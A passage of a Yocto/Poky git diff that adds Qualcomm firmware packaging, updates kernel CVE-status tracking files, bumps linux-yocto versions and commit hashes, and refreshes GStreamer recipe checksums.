${nonarch_base_libdir}/firmware/qcom/apq8016/modem.mbn" FILES:${PN}-qcom-apq8016-wifi = "${nonarch_base_libdir}/firmware/qcom/apq8016/wcnss.mbn ${nonarch_base_libdir}/firmware/qcom/apq8016/WCNSS*" FILES:${PN}-qcom-apq8096-adreno = "${nonarch_base_libdir}/firmware/qcom/apq8096/a530_zap.mbn ${nonarch_base_libdir}/firmware/qcom/a530_zap.mdt" FILES:${PN}-qcom-apq8096-audio = "${nonarch_base_libdir}/firmware/qcom/apq8096/adsp*.*" FILES:${PN}-qcom-apq8096-modem = "${nonarch_base_libdir}/firmware/qcom/apq8096/mba.mbn ${nonarch_base_libdir}/firmware/qcom/apq8096/modem*.* ${nonarch_base_libdir}/firmware/qcom/apq8096/wlanmdsp.mbn" +FILES:${PN}-qcom-qcm2290-adreno = "${nonarch_base_libdir}/firmware/qcom/qcm2290/a702_zap.mbn" +FILES:${PN}-qcom-qcm2290-audio = "${nonarch_base_libdir}/firmware/qcom/qcm2290/adsp*.*" +FILES:${PN}-qcom-qcm2290-modem = "${nonarch_base_libdir}/firmware/qcom/qcm2290/modem*.*" +FILES:${PN}-qcom-qcm2290-wifi = "${nonarch_base_libdir}/firmware/qcom/qcm2290/wlanmdsp.mbn" +FILES:${PN}-qcom-qrb4210-adreno = "${nonarch_base_libdir}/firmware/qcom/qrb4210/a610_zap.mbn" +FILES:${PN}-qcom-qrb4210-audio = "${nonarch_base_libdir}/firmware/qcom/qrb4210/adsp*.*" +FILES:${PN}-qcom-qrb4210-compute = "${nonarch_base_libdir}/firmware/qcom/qrb4210/cdsp*.*" +FILES:${PN}-qcom-qrb4210-modem = "${nonarch_base_libdir}/firmware/qcom/qrb4210/modem*.*" +FILES:${PN}-qcom-qrb4210-wifi = "${nonarch_base_libdir}/firmware/qcom/qrb4210/wlanmdsp.mbn" FILES:${PN}-qcom-sc8280xp-lenovo-x13s-compat = "${nonarch_base_libdir}/firmware/qcom/LENOVO/21BX" -FILES:${PN}-qcom-sc8280xp-lenovo-x13s-audio = "${nonarch_base_libdir}/firmware/qcom/sc8280xp/LENOVO/21BX/*adsp*.* ${nonarch_base_libdir}/firmware/qcom/sc8280xp/LENOVO/21BX/battmgr.jsn ${nonarch_base_libdir}/firmware/qcom/sc8280xp/LENOVO/21BX/audioreach-tplg.bin" +FILES:${PN}-qcom-sc8280xp-lenovo-x13s-audio = "${nonarch_base_libdir}/firmware/qcom/sc8280xp/LENOVO/21BX/*adsp*.* ${nonarch_base_libdir}/firmware/qcom/sc8280xp/LENOVO/21BX/battmgr.jsn ${nonarch_base_libdir}/firmware/qcom/sc8280xp/LENOVO/21BX/audioreach-tplg.bin ${nonarch_base_libdir}/firmware/qcom/sc8280xp/SC8280XP-LENOVO-X13S-tplg.bin" FILES:${PN}-qcom-sc8280xp-lenovo-x13s-adreno = "${nonarch_base_libdir}/firmware/qcom/sc8280xp/LENOVO/21BX/qcdxkmsuc8280.mbn" FILES:${PN}-qcom-sc8280xp-lenovo-x13s-compute = "${nonarch_base_libdir}/firmware/qcom/sc8280xp/LENOVO/21BX/*cdsp*.*" FILES:${PN}-qcom-sc8280xp-lenovo-x13s-sensors = "${nonarch_base_libdir}/firmware/qcom/sc8280xp/LENOVO/21BX/*slpi*.*" FILES:${PN}-qcom-sdm845-adreno = "${nonarch_base_libdir}/firmware/qcom/sdm845/a630*.*" FILES:${PN}-qcom-sdm845-audio = "${nonarch_base_libdir}/firmware/qcom/sdm845/adsp*.*" FILES:${PN}-qcom-sdm845-compute = "${nonarch_base_libdir}/firmware/qcom/sdm845/cdsp*.*" -FILES:${PN}-qcom-sdm845-modem = "${nonarch_base_libdir}/firmware/qcom/sdm845/mba.mbn ${nonarch_base_libdir}/firmware/qcom/sdm845/modem*.* ${nonarch_base_libdir}/firmware/qcom/sdm845/wlanmdsp.mbn" +FILES:${PN}-qcom-sdm845-modem = "${nonarch_base_libdir}/firmware/qcom/sdm845/mba.mbn ${nonarch_base_libdir}/firmware/qcom/sdm845/modem*.* ${nonarch_base_libdir}/firmware/qcom/sdm845/wlanmdsp.mbn ${nonarch_base_libdir}/firmware/qcom/sdm845/notice.txt_wlanmdsp" FILES:${PN}-qcom-sdm845-thundercomm-db845c-sensors = "${nonarch_base_libdir}/firmware/qcom/sdm845/Thundercomm/db845c/slpi*.*" FILES:${PN}-qcom-sm8250-adreno = "${nonarch_base_libdir}/firmware/qcom/sm8250/a650*.*" FILES:${PN}-qcom-sm8250-audio = "${nonarch_base_libdir}/firmware/qcom/sm8250/adsp*.*" FILES:${PN}-qcom-sm8250-compute = "${nonarch_base_libdir}/firmware/qcom/sm8250/cdsp*.*" +FILES:${PN}-qcom-sm8250-thundercomm-rb5-sensors = "${nonarch_base_libdir}/firmware/qcom/sm8250/Thundercomm/RB5/slpi*.*" RDEPENDS:${PN}-qcom-venus-1.8 = "${PN}-qcom-license" RDEPENDS:${PN}-qcom-venus-4.2 = "${PN}-qcom-license" RDEPENDS:${PN}-qcom-venus-5.2 = "${PN}-qcom-license" RDEPENDS:${PN}-qcom-venus-5.4 = "${PN}-qcom-license" +RDEPENDS:${PN}-qcom-venus-6.0 = "${PN}-qcom-license" RDEPENDS:${PN}-qcom-vpu-1.0 = "${PN}-qcom-license" RDEPENDS:${PN}-qcom-vpu-2.0 = "${PN}-qcom-license" RDEPENDS:${PN}-qcom-adreno-a2xx = "${PN}-qcom-license ${PN}-qcom-yamato-license" @@ -1153,20 +1407,34 @@ RDEPENDS:${PN}-qcom-adreno-a530 = "${PN}-qcom-license" RDEPENDS:${PN}-qcom-adreno-a630 = "${PN}-qcom-license" RDEPENDS:${PN}-qcom-adreno-a650 = "${PN}-qcom-license" RDEPENDS:${PN}-qcom-adreno-a660 = "${PN}-qcom-license" +RDEPENDS:${PN}-qcom-adreno-a702 = "${PN}-qcom-license" RDEPENDS:${PN}-qcom-apq8016-modem = "${PN}-qcom-license" RDEPENDS:${PN}-qcom-apq8016-wifi = "${PN}-qcom-license" +RDEPENDS:${PN}-qcom-apq8096-adreno = "${PN}-qcom-license" RDEPENDS:${PN}-qcom-apq8096-audio = "${PN}-qcom-license" RDEPENDS:${PN}-qcom-apq8096-modem = "${PN}-qcom-license" +RDEPENDS:${PN}-qcom-qcm2290-adreno = "${PN}-qcom-license" +RDEPENDS:${PN}-qcom-qcm2290-audio = "${PN}-qcom-license" +RDEPENDS:${PN}-qcom-qcm2290-modem = "${PN}-qcom-license" +RDEPENDS:${PN}-qcom-qcm2290-wifi = "${PN}-qcom-license" +RDEPENDS:${PN}-qcom-qrb4210-adreno = "${PN}-qcom-license" +RDEPENDS:${PN}-qcom-qrb4210-audio = "${PN}-qcom-license" +RDEPENDS:${PN}-qcom-qrb4210-compute = "${PN}-qcom-license" +RDEPENDS:${PN}-qcom-qrb4210-modem = "${PN}-qcom-license" +RDEPENDS:${PN}-qcom-qrb4210-wifi = "${PN}-qcom-license" RDEPENDS:${PN}-qcom-sc8280xp-lenovo-x13s-audio = "${PN}-qcom-license" RDEPENDS:${PN}-qcom-sc8280xp-lenovo-x13s-adreno = "${PN}-qcom-license" RDEPENDS:${PN}-qcom-sc8280xp-lenovo-x13s-compute = "${PN}-qcom-license" RDEPENDS:${PN}-qcom-sc8280xp-lenovo-x13s-sensors = "${PN}-qcom-license" +RDEPENDS:${PN}-qcom-sdm845-adreno = "${PN}-qcom-license" RDEPENDS:${PN}-qcom-sdm845-audio = "${PN}-qcom-license" RDEPENDS:${PN}-qcom-sdm845-compute = "${PN}-qcom-license" RDEPENDS:${PN}-qcom-sdm845-modem = "${PN}-qcom-license" RDEPENDS:${PN}-qcom-sdm845-thundercomm-db845c-sensors = "${PN}-qcom-license" +RDEPENDS:${PN}-qcom-sm8250-adreno = "${PN}-qcom-license" RDEPENDS:${PN}-qcom-sm8250-audio = "${PN}-qcom-license" RDEPENDS:${PN}-qcom-sm8250-compute = "${PN}-qcom-license" +RDEPENDS:${PN}-qcom-sm8250-thundercomm-rb5-sensors = "${PN}-qcom-license" RRECOMMENDS:${PN}-qcom-sc8280xp-lenovo-x13s-audio = "${PN}-qcom-sc8280xp-lenovo-x13s-compat" RRECOMMENDS:${PN}-qcom-sc8280xp-lenovo-x13s-adreno = "${PN}-qcom-sc8280xp-lenovo-x13s-compat" diff --git a/poky/meta/recipes-kernel/linux/cve-exclusion_6.1.inc b/poky/meta/recipes-kernel/linux/cve-exclusion_6.1.inc index a8df51f321..1b51737c7d 100644 --- a/poky/meta/recipes-kernel/linux/cve-exclusion_6.1.inc +++ b/poky/meta/recipes-kernel/linux/cve-exclusion_6.1.inc @@ -1,9 +1,9 @@ # Auto-generated CVE metadata, DO NOT EDIT BY HAND. -# Generated at 2023-11-03 13:24:16.070181+00:00 for version 6.1.57 +# Generated at 2023-12-23 08:44:42.304531+00:00 for version 6.1.68 python check_kernel_cve_status_version() { - this_version = "6.1.57" + this_version = "6.1.68" kernel_version = d.getVar("LINUX_VERSION") if kernel_version != this_version: bb.warn("Kernel CVE status needs updating: generated for %s but kernel is %s" % (this_version, kernel_version)) @@ -4524,7 +4524,7 @@ CVE_STATUS[CVE-2022-43945] = "fixed-version: Fixed from version 6.1rc1" # CVE-2022-44033 needs backporting (fixed from 6.4rc1) -# CVE-2022-44034 has no known resolution +# CVE-2022-44034 needs backporting (fixed from 6.4rc1) # CVE-2022-4543 has no known resolution @@ -5016,6 +5016,10 @@ CVE_STATUS[CVE-2023-39193] = "cpe-stable-backport: Backported in 6.1.53" CVE_STATUS[CVE-2023-39194] = "cpe-stable-backport: Backported in 6.1.47" +CVE_STATUS[CVE-2023-39197] = "cpe-stable-backport: Backported in 6.1.39" + +CVE_STATUS[CVE-2023-39198] = "cpe-stable-backport: Backported in 6.1.47" + CVE_STATUS[CVE-2023-4004] = "cpe-stable-backport: Backported in 6.1.42" # CVE-2023-4010 has no known resolution @@ -5102,7 +5106,7 @@ CVE_STATUS[CVE-2023-4881] = "cpe-stable-backport: Backported in 6.1.54" CVE_STATUS[CVE-2023-4921] = "cpe-stable-backport: Backported in 6.1.54" -# CVE-2023-5090 needs backporting (fixed from 6.6rc7) +CVE_STATUS[CVE-2023-5090] = "cpe-stable-backport: Backported in 6.1.62" CVE_STATUS[CVE-2023-5158] = "cpe-stable-backport: Backported in 6.1.57" @@ -5112,7 +5116,19 @@ CVE_STATUS[CVE-2023-5197] = "cpe-stable-backport: Backported in 6.1.56" CVE_STATUS[CVE-2023-5345] = "cpe-stable-backport: Backported in 6.1.56" -# CVE-2023-5633 needs backporting (fixed from 6.6rc6) +CVE_STATUS[CVE-2023-5633] = "fixed-version: only affects 6.2 onwards" # CVE-2023-5717 needs backporting (fixed from 6.1.60) +# CVE-2023-5972 needs backporting (fixed from 6.6rc7) + +# CVE-2023-6039 needs backporting (fixed from 6.5rc5) + +CVE_STATUS[CVE-2023-6111] = "fixed-version: only affects 6.6rc3 onwards" + +CVE_STATUS[CVE-2023-6121] = "cpe-stable-backport: Backported in 6.1.65" + +CVE_STATUS[CVE-2023-6176] = "cpe-stable-backport: Backported in 6.1.54" + +# CVE-2023-6238 has no known resolution + diff --git a/poky/meta/recipes-kernel/linux/cve-exclusion_6.5.inc b/poky/meta/recipes-kernel/linux/cve-exclusion_6.5.inc index d48b0e1493..7711bcb4d6 100644 --- a/poky/meta/recipes-kernel/linux/cve-exclusion_6.5.inc +++ b/poky/meta/recipes-kernel/linux/cve-exclusion_6.5.inc @@ -1,9 +1,9 @@ # Auto-generated CVE metadata, DO NOT EDIT BY HAND. -# Generated at 2023-11-03 13:24:25.010946+00:00 for version 6.5.7 +# Generated at 2023-12-18 14:15:23.952852+00:00 for version 6.5.13 python check_kernel_cve_status_version() { - this_version = "6.5.7" + this_version = "6.5.13" kernel_version = d.getVar("LINUX_VERSION") if kernel_version != this_version: bb.warn("Kernel CVE status needs updating: generated for %s but kernel is %s" % (this_version, kernel_version)) @@ -4524,7 +4524,7 @@ CVE_STATUS[CVE-2022-44032] = "fixed-version: Fixed from version 6.4rc1" CVE_STATUS[CVE-2022-44033] = "fixed-version: Fixed from version 6.4rc1" -# CVE-2022-44034 has no known resolution +CVE_STATUS[CVE-2022-44034] = "fixed-version: Fixed from version 6.4rc1" # CVE-2022-4543 has no known resolution @@ -5016,6 +5016,10 @@ CVE_STATUS[CVE-2023-39191] = "fixed-version: Fixed from version 6.3rc1" CVE_STATUS[CVE-2023-39194] = "fixed-version: Fixed from version 6.5rc7" +CVE_STATUS[CVE-2023-39197] = "fixed-version: Fixed from version 6.5rc1" + +CVE_STATUS[CVE-2023-39198] = "fixed-version: Fixed from version 6.5rc7" + CVE_STATUS[CVE-2023-4004] = "fixed-version: Fixed from version 6.5rc3" # CVE-2023-4010 has no known resolution @@ -5116,3 +5120,15 @@ CVE_STATUS[CVE-2023-4732] = "fixed-version: Fixed from version 5.14rc1" # CVE-2023-5717 needs backporting (fixed from 6.6rc7) +CVE_STATUS[CVE-2023-5972] = "cpe-stable-backport: Backported in 6.5.9" + +CVE_STATUS[CVE-2023-6039] = "fixed-version: Fixed from version 6.5rc5" + +CVE_STATUS[CVE-2023-6111] = "fixed-version: only affects 6.6rc3 onwards" + +# CVE-2023-6121 needs backporting (fixed from 6.7rc3) + +CVE_STATUS[CVE-2023-6176] = "cpe-stable-backport: Backported in 6.5.4" + +# CVE-2023-6238 has no known resolution + diff --git a/poky/meta/recipes-kernel/linux/linux-yocto-rt_6.1.bb b/poky/meta/recipes-kernel/linux/linux-yocto-rt_6.1.bb index 0272a8a59e..5cfc5a7dd8 100644 --- a/poky/meta/recipes-kernel/linux/linux-yocto-rt_6.1.bb +++ b/poky/meta/recipes-kernel/linux/linux-yocto-rt_6.1.bb @@ -14,13 +14,13 @@ python () { raise bb.parse.SkipRecipe("Set PREFERRED_PROVIDER_virtual/kernel to linux-yocto-rt to enable it") } -SRCREV_machine ?= "a3ae026c0673c043e1fd3374e488a78b29249534" -SRCREV_meta ?= "8aa5efbc5e5361efc8b11c5aec9b967085613a0b" +SRCREV_machine ?= "739b3001f20153a66d2723de81faae18cd61892b" +SRCREV_meta ?= "991713c8765172cb5d18703d15589f3ec6e1b772" SRC_URI = "git://git.yoctoproject.org/linux-yocto.git;branch=${KBRANCH};name=machine;protocol=https \ git://git.yoctoproject.org/yocto-kernel-cache;type=kmeta;name=meta;branch=yocto-6.1;destsuffix=${KMETA};protocol=https" -LINUX_VERSION ?= "6.1.57" +LINUX_VERSION ?= "6.1.68" LIC_FILES_CHKSUM = "file://COPYING;md5=6bc538ed5bd9a7fc9398086aedcd7e46" diff --git a/poky/meta/recipes-kernel/linux/linux-yocto-rt_6.5.bb b/poky/meta/recipes-kernel/linux/linux-yocto-rt_6.5.bb index 598280c5b6..0120b9ba63 100644 --- a/poky/meta/recipes-kernel/linux/linux-yocto-rt_6.5.bb +++ b/poky/meta/recipes-kernel/linux/linux-yocto-rt_6.5.bb @@ -14,13 +14,13 @@ python () { raise bb.parse.SkipRecipe("Set PREFERRED_PROVIDER_virtual/kernel to linux-yocto-rt to enable it") } -SRCREV_machine ?= "2aa14dbb8520e59358778a80b32d7ccf6dd6c2ac" -SRCREV_meta ?= "9af846da534077c91e3c42242fceba7aef8dd784" +SRCREV_machine ?= "3ad8578bcc3186cde9b35de8c56afc0cba68bc55" +SRCREV_meta ?= "3b1f87ec237ec3ad9acffb3d75c55efe958085dc" SRC_URI = "git://git.yoctoproject.org/linux-yocto.git;branch=${KBRANCH};name=machine;protocol=https \ git://git.yoctoproject.org/yocto-kernel-cache;type=kmeta;name=meta;branch=yocto-6.5;destsuffix=${KMETA};protocol=https" -LINUX_VERSION ?= "6.5.7" +LINUX_VERSION ?= "6.5.13" LIC_FILES_CHKSUM = "file://COPYING;md5=6bc538ed5bd9a7fc9398086aedcd7e46" diff --git a/poky/meta/recipes-kernel/linux/linux-yocto-tiny_6.1.bb b/poky/meta/recipes-kernel/linux/linux-yocto-tiny_6.1.bb index b05f3107af..e19b0ec132 100644 --- a/poky/meta/recipes-kernel/linux/linux-yocto-tiny_6.1.bb +++ b/poky/meta/recipes-kernel/linux/linux-yocto-tiny_6.1.bb @@ -8,7 +8,7 @@ require recipes-kernel/linux/linux-yocto.inc # CVE exclusions include recipes-kernel/linux/cve-exclusion_6.1.inc -LINUX_VERSION ?= "6.1.57" +LINUX_VERSION ?= "6.1.68" LIC_FILES_CHKSUM = "file://COPYING;md5=6bc538ed5bd9a7fc9398086aedcd7e46" DEPENDS += "${@bb.utils.contains('ARCH', 'x86', 'elfutils-native', '', d)}" @@ -17,8 +17,8 @@ DEPENDS += "openssl-native util-linux-native" KMETA = "kernel-meta" KCONF_BSP_AUDIT_LEVEL = "2" -SRCREV_machine ?= "8a449d3428e673be0bdb504dadb666b4ad7208e3" -SRCREV_meta ?= "8aa5efbc5e5361efc8b11c5aec9b967085613a0b" +SRCREV_machine ?= "db1e71dc5c31557828fae0084b0f9cc83882eacd" +SRCREV_meta ?= "991713c8765172cb5d18703d15589f3ec6e1b772" PV = "${LINUX_VERSION}+git" diff --git a/poky/meta/recipes-kernel/linux/linux-yocto-tiny_6.5.bb b/poky/meta/recipes-kernel/linux/linux-yocto-tiny_6.5.bb index b047ab340b..cc24e3d346 100644 --- a/poky/meta/recipes-kernel/linux/linux-yocto-tiny_6.5.bb +++ b/poky/meta/recipes-kernel/linux/linux-yocto-tiny_6.5.bb @@ -8,7 +8,7 @@ require recipes-kernel/linux/linux-yocto.inc # CVE exclusions include recipes-kernel/linux/cve-exclusion_6.5.inc -LINUX_VERSION ?= "6.5.7" +LINUX_VERSION ?= "6.5.13" LIC_FILES_CHKSUM = "file://COPYING;md5=6bc538ed5bd9a7fc9398086aedcd7e46" DEPENDS += "${@bb.utils.contains('ARCH', 'x86', 'elfutils-native', '', d)}" @@ -17,8 +17,8 @@ DEPENDS += "openssl-native util-linux-native" KMETA = "kernel-meta" KCONF_BSP_AUDIT_LEVEL = "2" -SRCREV_machine ?= "dfe7f47645429e162819c3d5690d8f5052f5b5a3" -SRCREV_meta ?= "9af846da534077c91e3c42242fceba7aef8dd784" +SRCREV_machine ?= "fc3138c70652b48a0bf3620fd7aa861fa1f14e27" +SRCREV_meta ?= "3b1f87ec237ec3ad9acffb3d75c55efe958085dc" PV = "${LINUX_VERSION}+git" diff --git a/poky/meta/recipes-kernel/linux/linux-yocto_6.1.bb b/poky/meta/recipes-kernel/linux/linux-yocto_6.1.bb index 062fde84a4..1329ccc958 100644 --- a/poky/meta/recipes-kernel/linux/linux-yocto_6.1.bb +++ b/poky/meta/recipes-kernel/linux/linux-yocto_6.1.bb @@ -18,25 +18,25 @@ KBRANCH:qemux86-64 ?= "v6.1/standard/base" KBRANCH:qemuloongarch64 ?= "v6.1/standard/base" KBRANCH:qemumips64 ?= "v6.1/standard/mti-malta64" -SRCREV_machine:qemuarm ?= "0ef61a389975a4019142c5f1e6608e6cc0a0df29" -SRCREV_machine:qemuarm64 ?= "8a449d3428e673be0bdb504dadb666b4ad7208e3" -SRCREV_machine:qemuloongarch64 ?= "8a449d3428e673be0bdb504dadb666b4ad7208e3" -SRCREV_machine:qemumips ?= "d15ee28355bed16d59dd7d56259d2132e5c1c4ad" -SRCREV_machine:qemuppc ?= "8a449d3428e673be0bdb504dadb666b4ad7208e3" -SRCREV_machine:qemuriscv64 ?= "8a449d3428e673be0bdb504dadb666b4ad7208e3" -SRCREV_machine:qemuriscv32 ?= "8a449d3428e673be0bdb504dadb666b4ad7208e3" -SRCREV_machine:qemux86 ?= "8a449d3428e673be0bdb504dadb666b4ad7208e3" -SRCREV_machine:qemux86-64 ?= "8a449d3428e673be0bdb504dadb666b4ad7208e3" -SRCREV_machine:qemumips64 ?= "e740b68e38e55ca342ab3b70fa2f965c5a86758b" -SRCREV_machine ?= "8a449d3428e673be0bdb504dadb666b4ad7208e3" -SRCREV_meta ?= "8aa5efbc5e5361efc8b11c5aec9b967085613a0b" +SRCREV_machine:qemuarm ?= "85915187700314cb7ac70fd33da3e9dfd7c20063" +SRCREV_machine:qemuarm64 ?= "db1e71dc5c31557828fae0084b0f9cc83882eacd" +SRCREV_machine:qemuloongarch64 ?= "db1e71dc5c31557828fae0084b0f9cc83882eacd" +SRCREV_machine:qemumips ?= "24b06ee00fc3b65a24d7e867148b08a85296e67c" +SRCREV_machine:qemuppc ?= "db1e71dc5c31557828fae0084b0f9cc83882eacd" +SRCREV_machine:qemuriscv64 ?= "db1e71dc5c31557828fae0084b0f9cc83882eacd" +SRCREV_machine:qemuriscv32 ?= "db1e71dc5c31557828fae0084b0f9cc83882eacd" +SRCREV_machine:qemux86 ?= "db1e71dc5c31557828fae0084b0f9cc83882eacd" +SRCREV_machine:qemux86-64 ?= "db1e71dc5c31557828fae0084b0f9cc83882eacd" +SRCREV_machine:qemumips64 ?= "d4659a339611a02e4ffc2861e697c1a278707d70" +SRCREV_machine ?= "db1e71dc5c31557828fae0084b0f9cc83882eacd" +SRCREV_meta ?= "991713c8765172cb5d18703d15589f3ec6e1b772" # set your preferred provider of linux-yocto to 'linux-yocto-upstream', and you'll # get the <version>/base branch, which is pure upstream -stable, and the same # meta SRCREV as the linux-yocto-standard builds. Select your version using the # normal PREFERRED_VERSION settings. BBCLASSEXTEND = "devupstream:target" -SRCREV_machine:class-devupstream ?= "082280fe94a09462c727fb6e7b0c982efb36dede" +SRCREV_machine:class-devupstream ?= "ba6f5fb465114fcd48ddb2c7a7740915b2289d6b" PN:class-devupstream = "linux-yocto-upstream" KBRANCH:class-devupstream = "v6.1/base" @@ -45,7 +45,7 @@ SRC_URI = "git://git.yoctoproject.org/linux-yocto.git;name=machine;branch=${KBRA SRC_URI += "file://0001-perf-cpumap-Make-counter-as-unsigned-ints.patch" LIC_FILES_CHKSUM = "file://COPYING;md5=6bc538ed5bd9a7fc9398086aedcd7e46" -LINUX_VERSION ?= "6.1.57" +LINUX_VERSION ?= "6.1.68" PV = "${LINUX_VERSION}+git" diff --git a/poky/meta/recipes-kernel/linux/linux-yocto_6.5.bb b/poky/meta/recipes-kernel/linux/linux-yocto_6.5.bb index 516605c587..e7abc9784a 100644 --- a/poky/meta/recipes-kernel/linux/linux-yocto_6.5.bb +++ b/poky/meta/recipes-kernel/linux/linux-yocto_6.5.bb @@ -18,25 +18,25 @@ KBRANCH:qemux86-64 ?= "v6.5/standard/base" KBRANCH:qemuloongarch64 ?= "v6.5/standard/base" KBRANCH:qemumips64 ?= "v6.5/standard/mti-malta64" -SRCREV_machine:qemuarm ?= "04942abac8568705f1fae34066db171b6e2669bd" -SRCREV_machine:qemuarm64 ?= "ea4b620f18f882b3d882a53ffa33d8125ab27c83" -SRCREV_machine:qemuloongarch64 ?= "14f83e40930806c3f5c61988e69a3ca1820a1b8f" -SRCREV_machine:qemumips ?= "3348b580e3c47da56ce97a8297a574c2e37bc410" -SRCREV_machine:qemuppc ?= "2fd47e07960edcd21455548ac6a25b19babe5c10" -SRCREV_machine:qemuriscv64 ?= "14f83e40930806c3f5c61988e69a3ca1820a1b8f" -SRCREV_machine:qemuriscv32 ?= "14f83e40930806c3f5c61988e69a3ca1820a1b8f" -SRCREV_machine:qemux86 ?= "14f83e40930806c3f5c61988e69a3ca1820a1b8f" -SRCREV_machine:qemux86-64 ?= "14f83e40930806c3f5c61988e69a3ca1820a1b8f" -SRCREV_machine:qemumips64 ?= "6706327d870a0f246df8ed20c6a7f51ef46db1d6" -SRCREV_machine ?= "14f83e40930806c3f5c61988e69a3ca1820a1b8f" -SRCREV_meta ?= "9af846da534077c91e3c42242fceba7aef8dd784" +SRCREV_machine:qemuarm ?= "07ca2c1cc013343f9a47b5ac4f37ed60f66fd73b" +SRCREV_machine:qemuarm64 ?= "7af45f35fdcc82bbff07fa3d031620d5f5728b6b" +SRCREV_machine:qemuloongarch64 ?= "e53dc7514de7d2fbe0f80547a50c0542928e2d11" +SRCREV_machine:qemumips ?= "e0b08aab2ccc4257f0b34e7dcb1e054ea188a43d" +SRCREV_machine:qemuppc ?= "9e609ca17604c708fdc6e7e5c9355bb2c5b73bcd" +SRCREV_machine:qemuriscv64 ?= "e53dc7514de7d2fbe0f80547a50c0542928e2d11" +SRCREV_machine:qemuriscv32 ?= "e53dc7514de7d2fbe0f80547a50c0542928e2d11" +SRCREV_machine:qemux86 ?= "e53dc7514de7d2fbe0f80547a50c0542928e2d11" +SRCREV_machine:qemux86-64 ?= "e53dc7514de7d2fbe0f80547a50c0542928e2d11" +SRCREV_machine:qemumips64 ?= "58ffd9a4a907262daaedd9aca1e95e65d9716de3" +SRCREV_machine ?= "e53dc7514de7d2fbe0f80547a50c0542928e2d11" +SRCREV_meta ?= "3b1f87ec237ec3ad9acffb3d75c55efe958085dc" # set your preferred provider of linux-yocto to 'linux-yocto-upstream', and you'll # get the <version>/base branch, which is pure upstream -stable, and the same # meta SRCREV as the linux-yocto-standard builds. Select your version using the # normal PREFERRED_VERSION settings. BBCLASSEXTEND = "devupstream:target" -SRCREV_machine:class-devupstream ?= "121c6addffd71815cbd333baf409be682e2e148f" +SRCREV_machine:class-devupstream ?= "4631960b4700dd53f5cebb4f7055fd00ccd556ce" PN:class-devupstream = "linux-yocto-upstream" KBRANCH:class-devupstream = "v6.5/base" @@ -44,7 +44,7 @@ SRC_URI = "git://git.yoctoproject.org/linux-yocto.git;name=machine;branch=${KBRA git://git.yoctoproject.org/yocto-kernel-cache;type=kmeta;name=meta;branch=yocto-6.5;destsuffix=${KMETA};protocol=https" LIC_FILES_CHKSUM = "file://COPYING;md5=6bc538ed5bd9a7fc9398086aedcd7e46" -LINUX_VERSION ?= "6.5.7" +LINUX_VERSION ?= "6.5.13" PV = "${LINUX_VERSION}+git" diff --git a/poky/meta/recipes-kernel/perf/perf.bb b/poky/meta/recipes-kernel/perf/perf.bb index 675acfaf26..a392166e73 100644 --- a/poky/meta/recipes-kernel/perf/perf.bb +++ b/poky/meta/recipes-kernel/perf/perf.bb @@ -73,6 +73,15 @@ SPDX_S = "${S}/tools/perf" # supported kernel. LDFLAGS="-ldl -lutil" +# Perf's build system adds its own optimization flags for most TUs, +# overriding the flags included here. But for some, perf does not add +# any -O option, so ensure the distro's chosen optimization gets used +# for those. Since ${SELECTED_OPTIMIZATION} always includes +# ${DEBUG_FLAGS} which in turn includes ${DEBUG_PREFIX_MAP}, this also +# ensures perf is built with appropriate -f*-prefix-map options, +# avoiding the 'buildpaths' QA warning. +TARGET_CC_ARCH += "${SELECTED_OPTIMIZATION}" + EXTRA_OEMAKE = '\ V=1 \ VF=1 \ diff --git a/poky/meta/recipes-multimedia/gstreamer/gst-devtools_1.22.6.bb b/poky/meta/recipes-multimedia/gstreamer/gst-devtools_1.22.7.bb index 90bbd9c733..b545f020cf 100644 --- a/poky/meta/recipes-multimedia/gstreamer/gst-devtools_1.22.6.bb +++ b/poky/meta/recipes-multimedia/gstreamer/gst-devtools_1.22.7.bb @@ -12,7 +12,7 @@ SRC_URI = "https://gstreamer.freedesktop.org/src/gst-devtools/gst-devtools-${PV} file://0001-connect-has-a-different-signature-on-musl.patch \ " -SRC_URI[sha256sum] = "8928560efaf16137c30285e718708e5d0bab0777eb4ef8127e0274e120d3d86b" +SRC_URI[sha256sum] = "157cf93fb2741cf0c3dea731be3af2ffae703c9f2cd3c0c91b380fbc685eb9f9" DEPENDS = "json-glib glib-2.0 glib-2.0-native gstreamer1.0 gstreamer1.0-plugins-base" RRECOMMENDS:${PN} = "git" diff --git a/poky/meta/recipes-multimedia/gstreamer/gstreamer1.0-libav_1.22.6.bb b/poky/meta/recipes-multimedia/gstreamer/gstreamer1.0-libav_1.22.7.bb index 8906556b44..7169223636 100644 --- a/poky/meta/recipes-multimedia/gstreamer/gstreamer1.0-libav_1.22.6.bb +++ b/poky/meta/recipes-multimedia/gstreamer/gstreamer1.0-libav_1.22.7.bb @@ -12,7 +12,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=69333daa044cb77e486cc36129f7a770 \ " SRC_URI = "https://gstreamer.freedesktop.org/src/gst-libav/gst-libav-${PV}.tar.xz" -SRC_URI[sha256sum] = "7789e6408388a25f23cbf948cfc5c6230d735bbcd8b7f37f4a01c9e348a1e3a7" +SRC_URI[sha256sum] = "1525b917141b895fe5cf618fe8867622b2528278a0286e9f727b5f37317daca1" S = "${WORKDIR}/gst-libav-${PV}" diff --git a/poky/meta/recipes-multimedia/gstreamer/gstreamer1.0-omx_1.22.6.bb b/poky/meta/recipes-multimedia/gstreamer/gstreamer1.0-omx_1.22.7.bb index 2579aa3d66..ad40cf5513 100644 --- a/poky/meta/recipes-multimedia/gstreamer/gstreamer1.0-omx_1.22.6.bb +++ b/poky/meta/recipes-multimedia/gstreamer/gstreamer1.0-omx_1.22.7.bb @@ -10,7 +10,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=4fbd65380cdd255951079008b364516c \ SRC_URI = "https://gstreamer.freedesktop.org/src/gst-omx/gst-omx-${PV}.tar.xz" -SRC_URI[sha256sum] = "223833c42518ad7eb1923bb4dd3726809f59a66d6e9aaaa69cb29ad0750c8758" +SRC_URI[sha256sum] = "d7a18ec47d40a472bd5cba2015e0be72b732f1699895398cec5cd8e6a3a53b44" S = "${WORKDIR}/gst-omx-${PV}" diff --git a/poky/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-bad_1.22.6.bb b/poky/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-bad_1.22.7.bb index 3db7ddff5f..b7d787b611 100644 --- a/poky/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-bad_1.22.6.bb +++ b/poky/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-bad_1.22.7.bb @@ -10,7 +10,7 @@ SRC_URI = 